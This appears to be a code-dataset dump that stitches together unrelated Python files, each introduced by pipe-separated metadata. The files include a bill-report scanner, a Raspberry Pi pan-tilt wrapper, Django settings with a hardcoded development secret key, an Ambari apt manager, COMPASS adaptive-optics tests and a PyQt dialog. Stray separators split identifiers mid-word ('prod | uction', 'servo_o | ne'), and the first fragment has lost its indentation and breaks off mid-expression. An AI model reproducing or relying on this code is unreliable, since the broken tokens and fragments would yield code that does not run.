# keep list of unmatched sponsors
session_d['unmatched_sponsors'].add(
(term_for_session(abbr, bill['session']), bill['chamber'],
sponsor['name'])
)
session_d['sponsors_per_type'][sponsor['type']] += 1
# handle no sponsors bills
if not bill['sponsors']:
if bill['_id'] not in quality_exceptions['bills:no_sponsors']:
session_d['sponsorless_count'] += 1
else:
quality_exceptions['bills:no_sponsors'].remove(bill['_id'])
# subjects
for subj in bill.get('scraped_subjects', []):
uncategorized_subjects[subj] += 1
if bill.get('subjects'):
session_d['_subjects_count'] += 1
for subject in bill['subjects']:
session_d['bills_per_subject'][subject] += 1
# sources
for source in bill['sources']:
duplicate_sources[source['url']] += 1
# versions
if not bill['versions']:
# total num of bills w/o versions
if bill['_id'] not in quality_exceptions['bills:no_versions']:
session_d['versionless_count'] += 1
else:
quality_exceptions['bills:no_versions'].remove(bill['_id'])
else:
# total num of versions
session_d['version_count'] += len(bill['versions'])
for doc in bill['versions']:
duplicate_versions[doc['url']] += 1
# TODO: add duplicate document detection back in?
# Check for progress meter gaps.
progress_meter_gaps = session_d['progress_meter_gaps']
action_dates = bill['action_dates']
bill_chamber = bill['chamber']
other_chamber = dict(lower='upper', upper='lower')[bill_chamber]
# Check for bills that were signed but didn't pass both chambers.
if bill['type'] == 'bill':
if action_dates['signed']:
if not action_dates['passed_upper']:
progress_meter_gaps.add(bill['_id'])
elif not action_dates['passed_lower']:
progress_meter_gaps.add(bill['_id'])
else:
# Check for nonbills that were signed but didn't pass their
# house of origin.
if action_dates['signed']:
if not action_dates['passed_' + bill_chamber]:
progress_meter_gaps.add(bill['_id'])
if action_dates['passed_' + other_chamber]:
if not action_dates['passed_' + bill_chamber]:
progress_meter_gaps.add(bill['_id'])
dup_version_urls = []
dup_source_urls = []
for url, n in duplicate_versions.iteritems():
if n > 1:
dup_version_urls.append(url)
for url, n in duplicate_sources.iteritems():
if n > 1:
dup_source_urls.append(url)
# do logging of unnecessary exceptions
for qe_type, qes in quality_exceptions.iteritems():
if qes:
logger.warning('unnecessary {0} exceptions for {1} bills: \n {2}'
.format(qe_type, len(qes), '\n '.join(qes)))
return {'duplicate_versions': dup_version_urls,
'duplicate_sources': dup_source_urls,
'other_actions': other_actions.items(),
'uncategorized_subjects': uncategorized_subjects.items(),
'sessions': sessions,
'progress_meter_gaps': []
}
def calculate_percentages(report):
# general bill stuff
bill_count = float(report['upper_count'] + report['lower_count']) / 100
if bill_count:
report['updated_this_year'] = (report.pop('_updated_this_year_count') /
bill_count)
report['updated_this_month'] = (report.pop('_updated_this_month_count')
/ bill_count)
report['updated_today'] = (report.pop('_updated_today_count') /
bill_count)
report['have_subjects'] = report.pop('_subjects_count') / bill_count
# actions
action_count = float(report['action_count']) / 100
if action_count:
for k in report['actions_per_type'].iterkeys():
report['actions_per_type'][k] /= action_count
for k in report['actions_per_actor'].iterkeys():
report['actions_per_actor'][k] /= action_count
for k in report['actions_per_month'].iterkeys():
report['actions_per_month'][k] /= action_count
# sponsors
_sponsor_count = float(report.pop('_sponsor_count')) / 100
if _sponsor_count:
report['sponsors_with_id'] = (
report.pop('_sponsors_with_id_count') / _sponsor_count)
for k in report['sponsors_per_type'].iterkeys():
report['sponsors_per_type'][k] /= _sponsor_count
def bill_report(abbr):
report = scan_bills(abbr)
combined_report = combine_reports(report['sessi |
WayneKeenan/picraftzero | picraftzero/thirdparty/pimoroni/pantilthat/__init__.py | Python | mit | 1,293 | 0.003094 | from sys import exit, version_info
import logging
logger = logging.getLogger(__name__)
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
logger.warning("Falling back to mock SMBus. This library requires python-smbus. Install with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
logger.warning("Falling back to mock SMBus. This library requires python3-smbus. Install with: sudo apt-get install python3-smbus")
from picraftzero.thirdparty.mocks.raspiberrypi.rpidevmocks import Mock_smbusModule
SMBus = Mock_smbusModule.SMBus
from .pantilt import PanTilt, WS2812, PWM, RGB, GRB, RGBW, GRBW
__version__ = '0.0.3'
pantilthat = PanTilt(i2c_bus=SMBus(1))
brightness = pantilthat.brightness
idle_timeout = pantilthat.idle_timeout
clear = pantilthat.clear
light_mode = pantilthat.light_mode
light_type = pantilthat.l | ight_type
servo_one = pantilthat.servo_one
servo_pulse_max = pantilthat.servo_pulse_max
servo_pulse_min = pantilthat.servo_pulse_min
servo_two = pantilthat.servo_two
servo_enable = pantilthat.servo_enable
set_all = pantilthat.set_all
set_pixel = pantilthat.set_pixel
set_pixel_rgbw = pantilthat.set_pixel_rgbw
show = pantilthat.show
pan = pantilthat.servo_o | ne
tilt = pantilthat.servo_two
|
moshthepitt/answers | template/settings.py | Python | mit | 6,081 | 0.000164 | """
Django settings for template project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in prod | uction secret!
SECRET_KEY = 'mgu70)6s2vl#66ymf-iz=i8z05q==adv@6^*6^$8@p$bp8v04c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'suit',
# django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
| 'django.contrib.humanize',
# custom
'core',
'users',
'questions',
'answers',
'reviews',
'reports',
'saas',
# third party
'allauth',
'allauth.account',
# 'allauth.socialaccount',
# 'allauth.socialaccount.providers.facebook',
# 'allauth.socialaccount.providers.twitter',
'crispy_forms',
'debug_toolbar',
'datatableview',
'compressor',
'sorl.thumbnail',
# 'cacheops',
'suit_redactor',
'mptt',
'autoslug',
'polymorphic',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# third party
'ajaxerrors.middleware.ShowAJAXErrors',
)
ROOT_URLCONF = 'template.urls'
WSGI_APPLICATION = 'template.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'OPTIONS': {
'context_processors': [
# default
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# custom
'django.template.context_processors.request',
"core.context_processors.site_processor",
"core.context_processors.debug_processor",
],
'loaders': [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
]),
],
# 'loaders': [
# 'django.template.loaders.filesystem.Loader',
# 'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
# ],
'debug': False,
},
},
]
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# other finders..
'compressor.finders.CompressorFinder',
)
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
"django.contrib.auth.backends.ModelBackend",
# `allauth` specific authentication methods, such as login by e-mail
"allauth.account.auth_backends.AuthenticationBackend"
)
# auth and allauth settings
LOGIN_REDIRECT_URL = '/dashboard'
SOCIALACCOUNT_QUERY_EMAIL = True
EMAIL_CONFIRMATION_DAYS = 14
ACCOUNT_AUTHENTICATION_METHOD = "username_email"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USER_DISPLAY = 'users.utils.get_user_display'
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email', 'publish_stream'],
'METHOD': 'js_sdk' # instead of 'oauth2'
}
}
ACCOUNT_USERNAME_BLACKLIST = ['mosh', 'moshthepitt', 'kelvin', 'nicole', 'jay', "wambere"]
# crispy forms
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# Pagination
PAGINATION_DEFAULT_PAGINATION = 20
# COMPRESSOR
COMPRESS_CSS_FILTERS = ['compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter']
# CACHE OPS
CACHEOPS_REDIS = {
'host': 'localhost', # redis-server is on same machine
'port': 6379, # default redis port
'db': 2, # SELECT non-default redis database
# using separate redis db or redis instance
# is highly recommended
'socket_timeout': 3,
}
CACHEOPS_DEGRADE_ON_FAILURE = True
CACHEOPS = {
# automatically cache everything
'*.*': ('all', 60 * 10),
}
# Suit
SUIT_CONFIG = {
'ADMIN_NAME': 'JibuPro',
'SEARCH_URL': '',
}
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Africa/Nairobi'
QUESTION_LABEL_THUMBS_SIZE = "400"
try:
from local_settings import *
except ImportError, e:
pass
|
sekikn/ambari | ambari-common/src/main/python/ambari_commons/repo_manager/apt_manager.py | Python | apache-2.0 | 13,082 | 0.010472 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import re
from .generic_manager import GenericManager, GenericManagerProperties
from .apt_parser import AptParser
from ambari_commons.constants import AMBARI_SUDO_BINARY
from ambari_commons import shell
from resource_management.core.logger import Logger
def replace_underscores(function_to_decorate):
def wrapper(*args, **kwargs):
self = args[0]
name = args[1].replace("_", "-")
return function_to_decorate(self, name, *args[2:], **kwargs)
return wrapper
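# Debian package names use dashes rather than underscores, so a decorated
# method called with e.g. "python_devel" forwards "python-devel" instead
# (the package name here is illustrative).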
class AptManagerProperties(GenericManagerProperties):
"""
Class to keep all Package-manager depended properties
"""
locked_output = "Unable to lock the administration directory"
repo_error = "Failure when receiving data from the peer"
repo_manager_bin = "/usr/bin/apt-get"
repo_cache_bin = "/usr/bin/apt-cache"
pkg_manager_bin = "/usr/bin/dpkg"
repo_update_cmd = [repo_manager_bin, 'update', '-qq']
available_packages_cmd = [repo_cache_bin, "dump"]
installed_packages_cmd = ['COLUMNS=999', pkg_manager_bin, "-l"]
repo_definition_location = "/etc/apt/sources.list.d"
install_cmd = {
True: [repo_manager_bin, '-o', "Dpkg::Options::=--force-confdef", '--allow-unauthenticated', '--assume-yes', 'install'],
False: [repo_manager_bin, '-q', '-o', "Dpkg::Options::=--force-confdef", '--allow-unauthenticated', '--assume-yes', 'install']
}
remove_cmd = {
True: [repo_manager_bin, '-y', 'remove'],
False: [repo_manager_bin, '-y', '-q', 'remove']
}
verify_dependency_cmd = [repo_manager_bin, '-qq', 'check']
install_cmd_env = {'DEBIAN_FRONTEND': 'noninteractive'}
repo_url_exclude = "ubuntu.com"
configuration_dump_cmd = [AMBARI_SUDO_BINARY, "apt-config", "dump"]
class AptManager(GenericManager):
def get_installed_package_version(self, package_name):
r = shell.subprocess_executor("dpkg -s {0} | grep Version | awk '{{print $2}}'".format(package_name))
return r.out.strip(os.linesep)
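  # Illustrative expansion of the command above (name/version hypothetical):
  #   dpkg -s curl | grep Version | awk '{print $2}'  ->  7.58.0-2ubuntu3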
@property
def properties(self):
return AptManagerProperties
def installed_packages(self, pkg_names=None, repo_filter=None):
"""
Return all installed pa | ckages in the system except packages in REPO_URL_EXCLUDE
:type pkg_names list|set
:type repo_filter str|None
:return formatted list of packages
"""
packages = []
available_packages = self._available_packages_dict(pkg_names, repo_filter)
with shell.process_executor(self.properties.installed_packages_cmd, error_c | allback=self._executor_error_handler,
strategy=shell.ReaderStrategy.BufferedChunks) as output:
for package, version in AptParser.packages_installed_reader(output):
        if package in available_packages:
          packages.append(available_packages[package])
        else:
          # case when the package does not belong to any known repo
          packages.append([package, version, "installed"])
return packages
def _available_packages(self, pkg_names=None, repo_filter=None):
"""
Returning list of the installed packages with possibility to filter them by name
:type pkg_names list|set
:type repo_filter str|None
"""
with shell.process_executor(self.properties.available_packages_cmd, error_callback=self._executor_error_handler,
strategy=shell.ReaderStrategy.BufferedChunks) as output:
for pkg_item in AptParser.packages_reader(output):
if repo_filter and repo_filter not in pkg_item[2]:
continue
if self.properties.repo_url_exclude in pkg_item[2]:
continue
if pkg_names and pkg_item[0] not in pkg_names:
continue
yield pkg_item
def _available_packages_dict(self, pkg_names=None, repo_filter=None):
"""
Same as available packages, but result returns as dict and package name as key
:type pkg_names list|set
:type repo_filter str|None
"""
result = {}
for item in self._available_packages(pkg_names, repo_filter):
result[item[0]] = item
return result
def available_packages(self, pkg_names=None, repo_filter=None):
"""
Returning list of the installed packages with possibility to filter them by name
:type pkg_names list|set
:type repo_filter str|None
"""
return [item for item in self._available_packages(pkg_names, repo_filter)]
def all_packages(self, pkg_names=None, repo_filter=None):
return self.available_packages(pkg_names, repo_filter)
def transform_baseurl_to_repoid(self, base_url):
"""
Transforms the URL looking like proto://localhost/some/long/path to localhost_some_long_path
:type base_url str
:rtype str
"""
url_proto_mask = "://"
url_proto_pos = base_url.find(url_proto_mask)
if url_proto_pos > 0:
base_url = base_url[url_proto_pos+len(url_proto_mask):]
return base_url.replace("/", "_").replace(" ", "_")
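  # Hedged example, per the docstring above:
  #   transform_baseurl_to_repoid("http://localhost/some/long/path")
  #   returns "localhost_some_long_path"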
def get_available_packages_in_repos(self, repos):
"""
Gets all (both installed and available) packages that are available at given repositories.
:type repos resource_management.libraries.functions.repository_util.CommandRepository
:return: installed and available packages from these repositories
"""
filtered_packages = []
packages = self.available_packages()
repo_ids = []
for repo in repos.items:
repo_ids.append(self.transform_baseurl_to_repoid(repo.base_url))
if repos.feat.scoped:
Logger.info("Looking for matching packages in the following repositories: {0}".format(", ".join(repo_ids)))
for repo_id in repo_ids:
for package in packages:
if repo_id in package[2]:
filtered_packages.append(package[0])
return filtered_packages
else:
Logger.info("Packages will be queried using all available repositories on the system.")
# this is the case where the hosts are marked as sysprepped, but
# search the repos on-system anyway. the url specified in ambari must match the one
# in the list file for this to work
for repo_id in repo_ids:
for package in packages:
if repo_id in package[2]:
filtered_packages.append(package[0])
if len(filtered_packages) > 0:
Logger.info("Found packages for repo {}".format(str(filtered_packages)))
return filtered_packages
else:
return [package[0] for package in packages]
def package_manager_configuration(self):
"""
Reading apt configuration
:return dict with apt properties
"""
with shell.process_executor(self.properties.configuration_dump_cmd, error_callback=self._executor_error_handler) as output:
configuration = list(AptParser.config_reader(output))
return dict(configuration)
def verify_dependencies(self):
"""
Verify that we have no dependency issues in package manager. Dependency issues could appear because of aborted or terminated
package installation process or invalid packages state after manual modification of packages list on the host
:return True if no dependency issues found, False if dependency issue present
:rtype bool
"""
r = shell.subprocess_executor(self.properties.verify_dependency_cmd)
pattern = re.compile("has missing dependency|E:")
if r.code or (r.out and pattern.search(r.out)):
err_msg = Logger.filter_text("Failed to verify package depen |
Gitweijie/first_project | networking_cisco/apps/saf/agent/topo_disc/topo_disc_constants.py | Python | apache-2.0 | 890 | 0 | # Copyright 2017 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the | specific language governing permissions and limitations
# under the License.
#
# Topology Discovery constants:
# Query LLDP Daemo | n every 15 seconds.
PERIODIC_TASK_INTERVAL = 15
# This means a topology update message will be sent after every minute (15*4),
# even if there's no change in the parameters.
TOPO_DISC_SEND_THRESHOLD = 4
|
ANR-COMPASS/shesha | tests/pytest/rtc/test_rtcUFU.py | Python | gpl-3.0 | 12,177 | 0.003449 | ## @package shesha.tests
## @brief Tests the RTC module
## @author COMPASS Team <https://github.com/ANR-COMPASS>
## @version 5.2.1
## @date 2022/01/24
## @copyright GNU Lesser General Public License
#
# This file is part of COMPASS <https://anr-compass.github.io/compass/>
#
# Copyright (C) 2011-2022 COMPASS Team <https://github.com/ANR-COMPASS>
# All rights reserved.
# Distributed under GNU - LGPL
#
# COMPASS is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser
# General Public License as published by the Free Software Foundation, either version 3 of the License,
# or any later version.
#
# COMPASS: End-to-end AO simulation tool using | GPU acceleration
# The COMPASS platform was designed to meet the need of high-performance for the simulation of AO systems.
#
# The final product includes a software package for simulating all the critical subcomponents of AO,
# particularly in the context of the ELT and a real-time core based on several control approaches,
# with performances consistent with its integration into an instrument. Taking advantage of the specific
# hardware arc | hitecture of the GPU, the COMPASS tool allows to achieve adequate execution speeds to
# conduct large simulation campaigns called to the ELT.
#
# The COMPASS platform can be used to carry a wide variety of simulations to both test specific components
# of AO of the E-ELT (such as wavefront analysis device with a pyramid or elongated Laser star), and
# various systems configurations such as multi-conjugate AO.
#
# COMPASS is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with COMPASS.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.txt>.
import numpy as np
import naga as ng
import os
from shesha.sutra_wrap import Rtc_UFU as Rtc
from shesha.supervisor.compassSupervisor import CompassSupervisor as Supervisor
from scipy.ndimage.measurements import center_of_mass
from shesha.config import ParamConfig
precision = 1e-2
config = ParamConfig(os.getenv("COMPASS_ROOT") +
"/shesha/tests/pytest/par/test_sh.py")
config.p_dms[0].unitpervolt = 500
config.p_dms[0].push4imat = 0.5
config.p_dms[1].unitpervolt = 500
config.p_dms[1].push4imat = 0.5
sup = Supervisor(config)
sup.wfs._wfs.d_wfs[0].set_fakecam(True)
sup.wfs._wfs.d_wfs[0].set_max_flux_per_pix(int(sup.config.p_wfss[0]._nphotons // 2))
sup.wfs._wfs.d_wfs[0].set_max_pix_value(2**16 - 1)
sup.next()
sup.rtc.open_loop(0)
sup.rtc.close_loop(0)
sup.rtc.do_control(0)
rtc = Rtc()
rtc.add_centroider(sup.context, sup.config.p_wfss[0]._nvalid,
sup.config.p_wfss[0].npix / 2 - 0.5, sup.config.p_wfss[0].pixsize, False, 0,
"cog")
rtc.add_controller(sup.context, "generic", 0, sup.config.p_controllers[0].delay,
sup.config.p_wfss[0]._nvalid * 2, sup.config.p_controllers[0].nactu,
idx_centro=np.zeros(1),
ncentro=1)
centro = rtc.d_centro[0]
control = rtc.d_control[0]
rtc.d_centro[0].set_npix(sup.config.p_wfss[0].npix)
xvalid = np.array(sup.rtc._rtc.d_centro[0].d_validx)
yvalid = np.array(sup.rtc._rtc.d_centro[0].d_validy)
rtc.d_centro[0].load_validpos(xvalid, yvalid, xvalid.size)
cmat = sup.rtc.get_command_matrix(0)
rtc.d_control[0].set_cmat(cmat)
rtc.d_control[0].set_gain(sup.config.p_controllers[0].gain)
frame = np.array(sup.wfs._wfs.d_wfs[0].d_camimg)
rtc.d_centro[0].load_img(frame, frame.shape[0])
rtc.d_centro[0].calibrate_img()
rtc.do_centroids(0)
slp = ng.array(rtc.d_control[0].d_centroids)
rtc.do_control(0)
com = ng.array(rtc.d_control[0].d_com)
dark = np.random.random(frame.shape)
flat = np.random.random(frame.shape)
centro.set_dark(dark, frame.shape[0])
centro.set_flat(flat, frame.shape[0])
def relative_array_error(array1, array2):
return np.abs((array1 - array2) / array2.max()).max()
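# For instance (illustrative): arrays [1., 2.] and [1., 4.] give
# max(|[0., -2.]| / 4.) = 0.5, i.e. errors are normalized by array2's peak.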
def test_initCentro_nvalid():
assert (centro.nvalid - sup.config.p_wfss[0]._nvalid < precision)
def test_initCentro_offset():
assert (centro.offset - (sup.config.p_wfss[0].npix / 2 - 0.5) < precision)
def test_initCentro_scale():
assert (centro.scale - sup.config.p_wfss[0].pixsize < precision)
def test_initCentro_type():
assert (centro.type == "cog")
def test_initControl_nslope():
assert (control.nslope - sup.config.p_wfss[0]._nvalid * 2 < precision)
def test_initControl_nactu():
assert (control.nactu - sup.config.p_controllers[0].nactu < precision)
def test_initControl_type():
assert (control.type == "generic")
def test_initControl_delay():
assert (control.delay - sup.config.p_controllers[0].delay < precision)
def test_set_npix():
assert (centro.npix - sup.config.p_wfss[0].npix < precision)
def test_load_validposX():
assert (relative_array_error(np.array(centro.d_validx), xvalid) < precision)
def test_load_validposY():
assert (relative_array_error(np.array(centro.d_validy), yvalid) < precision)
def test_set_cmat():
assert (relative_array_error(ng.array(control.d_cmat).toarray(), cmat) < precision)
def test_set_gain():
assert (control.gain - sup.config.p_controllers[0].gain < precision)
def test_load_img():
assert (relative_array_error(np.array(centro.d_img_raw), frame) < precision)
def test_set_dark():
assert (relative_array_error(ng.array(centro.d_dark).toarray(), dark) < precision)
def test_set_flat():
assert (relative_array_error(ng.array(centro.d_flat).toarray(), flat) < precision)
def test_calibrate_img():
centro.calibrate_img()
imgCal = (frame.astype(np.float32) - dark) * flat
assert (relative_array_error(ng.array(centro.d_img).toarray(), imgCal) < precision)
def test_doCentroids_cog():
bincube = np.array(sup.wfs._wfs.d_wfs[0].d_bincube)
slopes = np.zeros(sup.config.p_wfss[0]._nvalid * 2)
offset = centro.offset
scale = centro.scale
for k in range(sup.config.p_wfss[0]._nvalid):
tmp = center_of_mass(bincube[:, :, k])
slopes[k] = (tmp[0] - offset) * scale
slopes[k + sup.config.p_wfss[0]._nvalid] = (tmp[1] - offset) * scale
assert (relative_array_error(ng.array(control.d_centroids).toarray(), slopes) <
precision)
def test_do_control_generic():
slopes = ng.array(control.d_centroids).toarray()
gain = control.gain
cmat = ng.array(control.d_cmat).toarray()
commands = cmat.dot(slopes) * gain * (-1)
assert (relative_array_error(ng.array(control.d_com).toarray(), commands) <
precision)
def test_set_comRange():
control.set_comRange(-1, 1)
assert (control.comRange == (-1, 1))
def test_clipping():
control.set_comRange(-1, 1)
C = (np.random.random(sup.config.p_controllers[0].nactu) - 0.5) * 4
control.set_com(C, C.size)
rtc.do_clipping(0)
C_clipped = C.copy()
C_clipped[np.where(C > 1)] = 1
C_clipped[np.where(C < -1)] = -1
assert (relative_array_error(ng.array(control.d_com_clipped).toarray(), C_clipped) <
precision)
def test_add_perturb_voltage():
C = np.random.random(sup.config.p_controllers[0].nactu)
control.add_perturb_voltage("test", C, 1)
assert (relative_array_error(
ng.array(control.d_perturb_map["test"][0]).toarray(), C) < precision)
def test_remove_perturb_voltage():
control.remove_perturb_voltage("test")
assert (control.d_perturb_map == {})
def test_add_perturb():
C = np.random.random(sup.config.p_controllers[0].nactu)
control.add_perturb_voltage("test", C, 1)
com = ng.array(control.d_com_clipped).toarray()
control.add_perturb()
assert (relative_array_error(ng.array(control.d_com_clipped).toarray(), com + C) <
precision)
def test_disable_perturb_voltage():
control.disable_perturb_voltage("test")
com = ng.array(control.d_com).toarray()
control.add_perturb()
assert (relative_array_error(ng.array(control.d_com).toarray(), com) < precision)
def test_enable |
vince8290/dana | ui_files/samples.py | Python | gpl-3.0 | 11,728 | 0.004093 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'events.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
from collections import *
from functools import *
import os, glob
import pandas as pd
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_SamplesDialog(QtGui.QDialog):
def __init__(self, parent=None, datafolder=None):
"""
Constructor
"""
QtGui.QDialog.__init__(self, parent)
# self.filelist = filelist
self.datafolder = datafolder
# labels font
self.font_labels = QtGui.QFont("Arial", 12, QtGui.QFont.Bold)
self.font_edits = QtGui.QFont("Arial", 12)
self.font_buttons = QtGui.QFont("Arial", 10, QtGui.QFont.Bold)
self.setupUi(self)
self.exec_()
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(1000, 400)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
# list of Events
self.prepare_form(Dialog)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def load_data(self):
print(self.datafolder)
self.samplefile = glob.glob(os.path.join(self.datafolder, "*_SAMPLES.csv"))[0]
if os.path.isfile(self.samplefile):
self.samplesdf = pd.read_csv(self.samplefile, encoding='ISO-8859-1')
else:
print("File not found: ", self.samplefile)
self.samplesdf = None
self.combodefaults = {'cuvette': ['600', '2000', '4000']}
def prepare_form(self, Dialog):
# load or reload data
self.load_data()
# form dicts
edit_list = ['date', 'time', 'samplename', 'filename', 'smoothing', 'cal32', 'cal44', 'cons32', 'cons44',
'zero44', 'zero45', 'zero46', 'zero47', 'zero49']
combo_list = ['user', 'membrane', 'cuvette']
self.labels = defaultdict(defaultdict)
self.edits = defaultdict(defaultdict)
self.radios = defaultdict(defaultdict)
self.combobox = defaultdict(defaultdict)
self.labs = defaultdict(defaultdict)
self.labs = {"time": "Time",
"date": "Date",
"samplename": "Sample Name",
"filename": "File Name",
"smoothing": "Smoothing",
"cuvette": "Cuvette",
"user": "User",
"membrane": "Membrane",
"cal44": "Calibration 44",
"cal32": "Calibration 32",
"cons32": "Consumption 32",
"cons44": "Consumption 44",
"zero32": "Zero 32",
"zero44": "Zero 44",
"zero45": "Zero 45",
"zero46": "Zero 46",
"zero47": "Zero 47",
"zero49": "Zero 49"}
self.buttons = OrderedDict(sorted({'Apply': defaultdict(object), 'Delete': defaultdict(object)}.items()))
xpos, ypos = 1, 0
for row in self.samplesdf.iterrows():
row_index = row[0]
r = row[1]
self.radios[row_index] = QtGui.QRadioButton(Dialog)
self.radios[row_index].setObjectName(_fromUtf8("_".join(["radio", str(row_index)])))
self.gridLayout.addWidget(self.radios[row_index], ypos+1, 0, 1, 1)
for k in ['samplename', 'date', 'time', 'cuvette']:
# create labels
if ypos == 0:
self.labels[k] = QtGui.QLabel(Dialog)
self.labels[k].setObjectName(_fromUtf8("_".join(["label", k])))
self.labels[k].setText(str(self.labs[k]))
self.labels[k].setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
self.labels[k].setFont(self.font_labels)
self.gridLayout.addWidget(self.labels[k], 0, xpos, 1, 1)
if k in edit_list:
self.edits[k][row_index] = QtGui.QLineEdit(Dialog)
| self.edits[k][row_index].setObjectName(_fromUtf8("_".join(["edit", k, str(row_index)])))
self.edits[k][row_index].setText(str(r[k]))
self.edits[k][row_index].setFont(self.font_edits)
if k in ['time', 'date']:
self.edits[k][row_index].setF | ixedWidth(80)
self.gridLayout.addWidget(self.edits[k][row_index], ypos+1, xpos, 1, 1)
elif k in combo_list:
self.combobox[k][row_index] = QtGui.QComboBox(Dialog)
self.combobox[k][row_index].setObjectName(_fromUtf8("_".join(["combo", k, str(row_index)])))
self.combobox[k][row_index].addItems(self.combodefaults[k])
self.combobox[k][row_index].setCurrentIndex(self.combobox[k][row_index].findText(str(r[k]), QtCore.Qt.MatchFixedString))
self.combobox[k][row_index].setFont(self.font_edits)
self.gridLayout.addWidget(self.combobox[k][row_index], ypos+1, xpos, 1, 1)
xpos += 1
# create buttons
for k in self.buttons.keys():
# if ypos > 0:
self.buttons[k][row_index] = QtGui.QPushButton(Dialog)
self.buttons[k][row_index].setObjectName(_fromUtf8("_".join(["event", k, "button", str(row_index)])))
self.buttons[k][row_index].setText(_translate("Dialog", k + str(row_index), None))
self.buttons[k][row_index].setFont(self.font_buttons)
if k == 'Apply':
self.buttons[k][row_index].clicked.connect(partial(self.ask_apply_changes, [row_index, Dialog]))
self.buttons[k][row_index].setStyleSheet("background-color: #ffeedd")
elif k == 'Delete':
self.buttons[k][row_index].clicked.connect(partial(self.ask_delete_confirm1, [row_index, Dialog]))
self.buttons[k][row_index].setStyleSheet("background-color: #ffcddd")
self.gridLayout.addWidget(self.buttons[k][row_index], ypos+1, xpos, 1, 1)
xpos += 1
# increments
ypos += 1
xpos = 1
Dialog.resize(1000, 70 + (30 * ypos))
# self.add_row(Dialog)
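    # A minimal sketch (illustrative only, reusing names defined in
    # prepare_form above) of the partial() wiring: the clicked signal is
    # bound to a shared handler together with the row-specific arguments,
    # so each row's button invokes the handler with its own row index.
    #
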